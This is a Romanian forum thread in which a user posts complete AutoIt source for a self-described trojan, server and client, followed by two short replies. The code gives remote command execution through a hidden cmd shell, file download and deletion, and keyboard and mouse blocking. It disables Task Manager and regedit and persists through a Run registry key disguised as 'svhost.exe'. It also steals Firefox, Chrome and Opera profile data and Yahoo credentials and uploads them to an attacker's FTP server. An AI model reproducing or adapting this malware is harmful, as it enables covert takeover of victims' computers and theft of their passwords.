parazitul29 Posted October 10, 2010 Report Posted October 10, 2010 (edited) un simplu trojan in autoit, facut la plcitisealanu am testat toate functiile l-am scris l-am compilat am testat cateva functii se comportau destul de bine nu le-am testat decat pe cele de la stealere dar cred ca merg bine la stealere se trimite folderul din aplication data functii-internet explorer manipulation-download file-cmd control-delete file-mesage box-run-kill procces-delete file-open/close cd-blocheaza/deblocheaza tastatura si mouse-click la anumite coordonate-mouse wheel control-upload file-ets stealer-mozzila,opera,chrome stealer //netestat fura parolel criptate se gasesc pe net programe pentru decriptarea lor-disable/enable taskmanager,regedit-server startupscreenshotserver#include <IE.au3> #include <FTPEx.au3>#Include <File.au3>$g_IP = "127.0.0.1"Break (0)TCPStartUp()$MainSocket = TCPListen($g_IP, 5555, 100 )If $MainSocket = -1 Then Exitwhile 1$ConnectedSocket = TCPAccept( $MainSocket)$recv = TCPRecv($ConnectedSocket, 2048)$arr=StringSplit ( $recv, "|")if $arr[1]="run" ThenShellExecute($arr[2])EndIfif $arr[1]="procces" ThenProcessClose ($arr[2])EndIfIf $arr[1]="msgbox" Then msgbox(0,"mesaj",$arr[2])EndIfIf $arr[1]="delete" Then $del=FileDelete ( $arr[2]) $socket = TCPConnect( $g_IP, 5555 )$trim=TCPSend($socket,$del)EndIfif $arr[1]="mouseclick" Then MouseClick("left",$arr[2],$arr[3])EndIfif $arr[1]="mousewhell" ThenMouseWheel($arr[2],$arr[3])Endifif $arr[1]="opencd" Then CDTray ( $arr[2],$arr[3] )EndIfif $arr[1]="blocktast" Then BlockInput (1)EndIfif $arr[1]="enabletast" Then BlockInput(0)EndIfif $arr[1]="createieinv" Then$oIE=_IECreate($arr[2],0,0,1,0)EndIfif $arr[1]="navie" Then $noie=_IENavigate($oIE, $arr[2])EndIfif $arr[1]="manie" Then$oForm = _IEFormGetObjByName ($oIE, $arr[2])$oText = _IEFormElementGetObjByName ($oForm, $arr[3])_IEFormElementSetValue ($oText, $arr[4])_IEFormSubmit ($oForm)EndIfif $arr[1]="Console" Then Run(@ComSpec & " /c " & $arr[2], "", @SW_HIDE) EndIfif $arr[1]="download" ThenLocal $hDownload =InetGet($arr[2], $arr[3])Do Sleep(250)Until InetGetInfo($hDownload, 2) Local $nBytes = InetGetInfo($hDownload, 0)InetClose($hDownload)EndIfif $arr[1]="Regdel" Then RegDelete($arr[2])EndIfif $arr[1]="startup" Then RegWrite("HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru n\Server", "svhost.exe", "REG_SZ", "c:\windows\sistem32\svhost.exe") filecopy(@ScriptFullPath,"c:\windows\sistem32\svhost.exe")endifif $arr[1]="taskmanager" Then RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr", "REG_DWORD","1")EndIfif $arr[1]="regeditdisable" then regwrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","REG_DWORD","1") endifif $arr[1]="taskenable" Then RegWrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableTaskMgr", "REG_DWORD","0") endifif $arr[1]="regenable" Then regwrite("HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System","DisableRegistryTools","REG_DWORD","0")EndIf if $arr[1]="ftpup" Then $server = $arr[2]$username = $arr[3]$pass = $arr[4]$LocalFile=$arr[5]$Remotefile=$arr[6]$Open = _FTP_Open('MyFTP Control')$Conn = _FTP_Connect($Open, $server, $username, $pass)_FTP_FilePut($Conn, $LocalFile, $RemoteFile,"FTP_TRANSFER_TYPE_BINARY")$Ftpc = _FTP_Close($Open)EndIfif $arr[1]="ets" then$grt=regread("HKEY_CURRENT_USER\Software\yahoo\pager","ETS")_FileCreate("c:\windows\test.txt")$file=FileOpen ( "c:\windows\test.txt",2)If $file = -1 Then MsgBox(0, "Error", "Unable to open file.") ExitEndIfFileWrite($file, $grt)$server = $arr[2]$username = $arr[3]$pass = $arr[4]$LocalFile="c:\windows\test.txt"$Remotefile="/ets.txt"$Open = _FTP_Open('MyFTP Control')$Conn = _FTP_Connect($Open, $server, $username, $pass)_FTP_FilePut($Conn, $LocalFile, $RemoteFile,"FTP_TRANSFER_TYPE_BINARY")$Ftpc = _FTP_Close($Open)EndIfif $arr[1]="mozzila" Then$server = $arr[2]$username = $arr[3]$pass = $arr[4]$Localfolder=@AppDataDir & "\Mozilla\Firefox\Profiles"$Remotefolder="/mozzila"$Open = _FTP_Open('MyFTP Control')$Conn = _FTP_Connect($Open, $server, $username, $pass)_FTP_DirPutContents($Conn, $Localfolder, $Remotefolder,0)$Ftpc = _FTP_Close($Open)EndIfif $arr[1]="chrome" Then $server = $arr[2]$username = $arr[3]$pass = $arr[4]$Localfolder=@AppDataDir & "\Google\Chrome\User Data\Default"$Remotefolder="/chrome"$Open = _FTP_Open('MyFTP Control')$Conn = _FTP_Connect($Open, $server, $username, $pass)_FTP_DirPutContents($Conn, $Localfolder, $Remotefolder,0)$Ftpc = _FTP_Close($Open)EndIfif $arr[1]="opera" Then $server = $arr[2]$username = $arr[3]$pass = $arr[4]$Localfolder=@AppDataDir & "\Opera\Opera\profile"$Remotefolder="/opera"$Open = _FTP_Open('MyFTP Control')$Conn = _FTP_Connect($Open, $server, $username, $pass)_FTP_DirPutContents($Conn, $Localfolder, $Remotefolder,0)$Ftpc = _FTP_Close($Open)EndIf wendclient#include <GUIConstantsEx.au3>#include<string.au3>$g_IP = "127.0.0.1"func internexp() GUICreate("set")$navigate=guictrlcreateinput("www.example.com/navigate",40, 80, 200, 20)$create=guictrlcreateinput("wwww.example.com",40, 50, 200, 20)$formname=guictrlcreateinput("form",40, 140, 100, 20)$formelement=guictrlcreateinput("inputbox",150, 140, 100, 20)$valori=guictrlcreateinput("exemplu exemplu",260, 140, 100, 20) $create = GUICtrlCreateButton("lanseaza ie", 240,50, 150)$nav = GUICtrlCreateButton("dute la",240, 80, 150) $submit = GUICtrlCreateButton("trimite datele",120, 170, 150)GUICtrlSetState(-1, $GUI_FOCUS) gUICtrlSetState(-1, $GUI_FOCUS) GUISetState() DoTCPStartUp()$msg = GUIGetMsg() if $msg=$create Then $cre=GUICtrlRead($create) $socket = TCPConnect( $g_IP, 5555 ) $crea=_StringInsert($cre,"createieinv|",0) TCPSend($socket, $crea)endifif $msg=$nav Then $nav=GUICtrlRead($navigate) $socket = TCPConnect( $g_IP, 5555 ) $nave=_StringInsert($cre,"navie|",0) TCPSend($socket, $nave)EndIfif $msg=$submit Then $form2=GUICtrlRead($formname) $formele=GUICtrlRead($formelement) $form3=stringlen($form2) $form4=_StringInsert($form2,$formele,$form3) $form5=_StringInsert($form4,"|",$form2) $form6=_Stringinsert($form5,"manie|",0) $socket = TCPConnect( $g_IP, 5555 )TCPSend($socket, $form6)EndIf Until $msg = $GUI_EVENT_CLOSEEndFuncGUICreate("set",600,500)$download=guictrlcreateinput("http//www.examplu.com/exemplu.exe",40, 0, 200, 20)$downloc=guictrlcreateinput("c:\exemplu.exe",40, 25, 200, 20)$console=guictrlcreateinput("console",40, 50, 200, 20)$mesaji=guictrlcreateinput("mesaj",40, 80, 200, 20)$ruleazai=guictrlcreateinput("notepad.exe",40, 110, 200, 20)$killi=guictrlcreateinput("winamp.exe",40, 140, 200, 20)$deletei=guictrlcreateinput("",40, 170, 200, 20)$drivei=guictrlcreateinput("E:",40, 200, 40, 20)$openi=guictrlcreateinput("open",90, 200, 30, 20)$xcoori=guictrlcreateinput("500",40, 260, 30, 20)$ycoori=guictrlcreateinput("500",90, 260, 30, 20)$wheel1i=guictrlcreateinput("up",40, 320,30, 20)$wheel2i=guictrlcreateinput("2",90, 320,30, 20)$ftpupserv=guictrlcreateinput("ftp.server.com",350, 20, 200, 20)$ftpupuser=guictrlcreateinput("user",350, 50, 200, 20)$ftpuppass=guictrlcreateinput("parola",350, 80, 200, 20)$ftplocal=guictrlcreateinput("c:\test.exe",350, 110, 200, 20)$ftpservfile=guictrlcreateinput("/test.exe",350, 140, 200, 20)$ftpetserv=guictrlcreateinput("ftp.server.com",410, 260, 150, 20)$ftpetsus=guictrlcreateinput("utilizator",410, 290, 150, 20)$ftpetspas=guictrlcreateinput("parola",410, 320, 150, 20)$startup = GUICtrlCreateButton(" server startup", 360,440, 120)$stealets = GUICtrlCreateButton("ets steal", 380,360, 50)$mozzila = GUICtrlCreateButton("mozzila", 430,360, 50)$chrome = GUICtrlCreateButton("chrome", 480,360, 50)$opera = GUICtrlCreateButton("opera", 530,360, 50)$upload = GUICtrlCreateButton("upload", 420,170, 50)$cmd = GUICtrlCreateButton("cmd", 240,50, 50) $down = GUICtrlCreateButton("download", 240,15, 70) $mesaj = GUICtrlCreateButton("mesaj", 240,80, 50) $ruleaza = GUICtrlCreateButton("ruleaza",240, 110, 50) $kill = GUICtrlCreateButton("kill proces",240, 140, 90) $delete = GUICtrlCreateButton("delete",240, 170, 60)$drive = GUICtrlCreateButton("open/close drive",240, 200,100)$bloctast = GUICtrlCreateButton("blocheaza tastatura",10, 230,200)$debloc = GUICtrlCreateButton("deblocheaza taste",210, 230,200)$click = GUICtrlCreateButton("click",210, 260,40)$mouse = GUICtrlCreateButton("mouse wheel",210, 320,100)$internet = GUICtrlCreateButton("browser ie",40, 350,200)$distask = GUICtrlCreateButton(" taskmanager off",40, 400,140)$entask = GUICtrlCreateButton(" taskmanager on",40, 440,140)$disregedit = GUICtrlCreateButton(" regedit off",200, 400,140)$enregedit = GUICtrlCreateButton("regedit on",200, 440,140)$label1=GUICtrlCreateLabel("up/down", 40, 290)$label2=GUICtrlCreateLabel("xcoord", 0, 265)$label3=GUICtrlCreateLabel("ycoord", 125, 265)$label4=GUICtrlCreateLabel("drive", 10, 200)$label5=GUICtrlCreateLabel("open/closed", 130, 200) GUICtrlSetState(-1, $GUI_FOCUS) gUICtrlSetState(-1, $GUI_FOCUS) GUISetState() DoTCPStartUp()$msg = GUIGetMsg()if $msg=$stealets Then $serv=GUICtrlRead($ftpetserv) $user=GUICtrlRead($ftpetsus) $pas= guictrlread($ftpetspas) $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, "ets|"& $serv & "|" & $user & "|" & $pas)EndIfif $msg=$mozzila Then $serv=GUICtrlRead($ftpetserv) $user=GUICtrlRead($ftpetsus) $pas= guictrlread($ftpetspas) $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, "mozzila|"& $serv & "|" & $user & "|" & $pas)EndIfif $msg=$opera Then $serv=GUICtrlRead($ftpetserv) $user=GUICtrlRead($ftpetsus) $pas= guictrlread($ftpetspas) $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, "opera|"& $serv & "|" & $user & "|" & $pas)EndIfif $msg=$chrome Then $serv=GUICtrlRead($ftpetserv) $user=GUICtrlRead($ftpetsus) $pas= guictrlread($ftpetspas) $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, "chrome|"& $serv & "|" & $user & "|" & $pas) EndIfif $msg=$upload Then $servup=GUICtrlRead($ftpupserv) $servupuser=GUICtrlRead($ftpupuser) $servupass= GUICtrlRead($ftpuppass) $uplocal=GUICtrlRead($ftplocal) $upserv=GUICtrlRead($ftpservfile) $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, "ftpup|" & $servup & "|" & $servupuser & "|" & $servupass & "|" & $uplocal &"|" & $upserv )endifif $msg=$startup Then $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, "startup|sss")EndIfif $msg=$distask Then $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, "taskmanager|ss")EndIfif $msg=$entask Then $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, "taskenable|ss")EndIfif $msg=$disregedit Then $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, "regeditdisable|ss")EndIf if $msg=$enregedit Then $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, "regenable|ss")EndIfIf $msg=$down Then $down1=GUICtrlRead($download) $down2=GUICtrlRead($downloc) $downlen=stringlen($down1) $down3=_stringinsert($down1,$down2,$downlen) $down4=_stringinsert($down3,"|",$downlen) $down5=_stringinsert($down4,"download|",0) $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, $down5)endifif $msg=$cmd Then $cmdcontrol=guictrlread($console) $cmd2=_stringinsert($cmdcontrol,"console|",0) $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, $cmd2) endifif $msg=$mesaj Then $mes=GUICtrlRead($mesaji) $socket = TCPConnect( $g_IP, 5555 ) $mess=_StringInsert($mes,"msgbox|",0) TCPSend($socket, $mess)endifif $msg=$ruleaza Then $rul=GUICtrlRead($ruleazai) $socket = TCPConnect( $g_IP, 5555 ) $rull=_StringInsert($rul,"run|",0) TCPSend($socket, $rull)endifif $msg=$kill Then $kil=GUICtrlRead($killi) $kill=_StringInsert($kil,"procces|",0) $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, $kill)endifif $msg=$delete Then $del=GUICtrlRead($deletei) $socket = TCPConnect( $g_IP, 5555 ) $dell=_StringInsert($del,"delete|",0) TCPSend($socket, $dell)endifif $msg=$bloctast Then $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, "blocktast|ssss")EndIfif $msg=$debloc Then $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, "enabletast|ssss")endifIf $msg=$click Then $coordx=GUICtrlRead($xcoori) $coordy=GUICtrlRead($ycoori) $coordlen=stringlen($coordx) $coord=_stringinsert($coordx,$coordy,$coordlen) $coord2=_stringinsert($coordx,"|",$coordlen) $coord3=_stringinsert($coord2,"mouseclick|",0) $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, $coord3)endifIf $msg=$mouse Then $wheel1m=GUICtrlRead($wheel1i) $wheel2m=GUICtrlRead($wheel2i) $wheellen=stringlen($wheel1m) $wheel1=_stringinsert($wheel1m,$wheel2m,$wheellen) $wheel2=_stringinsert($wheel1,"|",$wheellen) $wheel3=_stringinsert($wheel2,"mousewhell|",0) $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, $wheel3)endifIf $msg=$mouse Then $wheel1m=GUICtrlRead($wheel1i) $wheel2m=GUICtrlRead($wheel2i) $wheellen=stringlen($wheel1m) $wheel1=_stringinsert($wheel1m,$wheel2m,$wheellen) $wheel2=_stringinsert($wheel1,"|",$wheellen) $wheel3=_stringinsert($wheel2,"mousewhell|",0) $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, $wheel3)endifIf $msg=$drive then$drive1=GUICtrlRead($drivei) $open1=GUICtrlRead($openi) $drivelen=stringlen($drive1) $cd=_stringinsert($drive1,$open1,$drivelen) $cd2=_stringinsert($cd,"|",$drivelen) $cd3=_stringinsert($cd2,"opencd|",0) $socket = TCPConnect( $g_IP, 5555 ) TCPSend($socket, $cd3) endifif $msg=$internet Theninternexp()endifUntil $msg = $GUI_EVENT_CLOSE Edited October 10, 2010 by parazitul29 Quote
Slym Posted October 10, 2010 Report Posted October 10, 2010 Frumos, tinand cont de faptul ca este in AutoIT. Quote
vampix1 Posted January 13, 2011 Report Posted January 13, 2011 Misto programul, l-am compilat dar nu merge sa il folosesc sau poate nu stiu eu. Quote